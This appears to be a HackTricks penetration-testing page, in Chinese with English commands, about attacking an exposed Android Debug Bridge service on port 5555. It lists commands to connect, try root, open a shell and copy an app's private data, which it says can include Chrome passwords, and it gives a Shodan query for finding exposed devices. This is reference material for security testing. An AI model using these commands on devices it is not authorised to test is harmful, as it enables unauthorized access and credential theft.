hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

基本信息

Android Debug Bridge (adb) 是一个多功能的命令行工具，可以与设备进行通信。adb命令可以执行各种设备操作，例如安装和调试应用程序，并提供访问Unix shell的功能，可以在设备上运行各种命令。 (来自这里)

默认端口：5555。

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

连接

如果发现设备上运行着一个端口上的ADB服务，并且你可以连接到它，你可以在系统内部获取一个shell：

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

要完全下载一个应用程序的数据，你可以执行以下操作：

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

您可以使用此技巧来检索敏感信息，例如Chrome密码。有关更多信息，请查看提供的参考资料here。

Shodan

• android debug bridge

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 您在网络安全公司工作吗？您想在HackTricks中看到您的公司广告吗？或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看SUBSCRIPTION PLANS！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获取官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或在Twitter上关注我🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。